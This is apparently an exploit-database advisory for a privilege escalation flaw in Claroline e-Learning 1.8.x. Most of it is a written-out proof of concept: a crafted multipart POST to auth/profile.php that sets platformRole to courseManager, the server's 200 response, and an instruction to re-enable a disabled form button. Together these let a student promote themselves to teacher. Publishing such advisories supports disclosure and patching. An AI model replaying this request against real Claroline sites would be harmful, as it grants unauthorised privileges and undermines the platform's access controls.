Claroline e-Learning 1.8.1 Privilege Escalation Vulnerability

2013-08-16T00:00:00
ID 1337DAY-ID-21121
Type zdt
Reporter phosphore
Modified 2013-08-16T00:00:00

Description

Due to insufficient permission checking in profile.php any user can assign hem or her self to any organization by issueing a single http request.

                                        
                                            Claroline users can assign themselves their platform role, leading to possible privilege escalation
  
Description:
  
Due to insufficient permission checking in profile.php any user
can assign hem or her self to any organization by issueing a single http request


 #######################################################


http://%targetsite%/claroline1811/claroline/auth/profile.php

POST /claroline1811/claroline/auth/profile.php HTTP/1.1
Host: %targetsite%
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://%targetsite%/claroline1811/claroline/auth/profile.php
Cookie: javascriptEnabled=true; 7e3da37302f0c5887c5a23ec673c8fda=0mmhmtdunecvb0o9q34k340qd0; bd84f0e7e57f5bde1a0f3d525d0f3511=h0ifng3c6of9ets5hihsr7jgg5
Content-Type: multipart/form-data; boundary=---------------------------114782935826962
Content-Length: 1443
-----------------------------114782935826962
Content-Disposition: form-data; name="cmd"

registration
-----------------------------114782935826962
Content-Disposition: form-data; name="claroFormId"

520df680057be
-----------------------------114782935826962
Content-Disposition: form-data; name="csrf_token"

0000token00000x0token000000token
-----------------------------114782935826962
Content-Disposition: form-data; name="uidToEdit"

9
-----------------------------114782935826962
Content-Disposition: form-data; name="lastname"

Tom
-----------------------------114782935826962
Content-Disposition: form-data; name="firstname"

Sawyer
-----------------------------114782935826962
Content-Disposition: form-data; name="officialCode"

TMSW
-----------------------------114782935826962
Content-Disposition: form-data; name="username"

littletomsawyer
-----------------------------114782935826962
Content-Disposition: form-data; name="email"


-----------------------------114782935826962
Content-Disposition: form-data; name="phone"


-----------------------------114782935826962
Content-Disposition: form-data; name="skype"


-----------------------------114782935826962
Content-Disposition: form-data; name="platformRole"

courseManager
-----------------------------114782935826962
Content-Disposition: form-data; name="applyChange"

OK
-----------------------------114782935826962--

HTTP/1.1 200 OK
Date: Fri, 16 Aug 2013 09:54:24 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze16
Expires: Thu, 19 Nov 1981 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2920
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1


########################################################
  

!! PoC:
@ auth/profile.php change the ' "disabled="true" ' status of the button:
<dl>
            <dt>
                Platform role            </dt>
            <dd>
                <input type="radio" checked="checked" value="student" id="student" name="platformRole"><label for="student"> (student)</label><br>
                <input type="radio" disabled="disabled" value="courseManager" id="courseManager" name="platformRole"><label for="courseManager">(teacher)</label><br>
                
             </dd>
            
</dl>
  
Systems affected:
  
Claroline 1.8.x
  
Vendor status :
  
Unknown

#  0day.today [2018-01-03]  #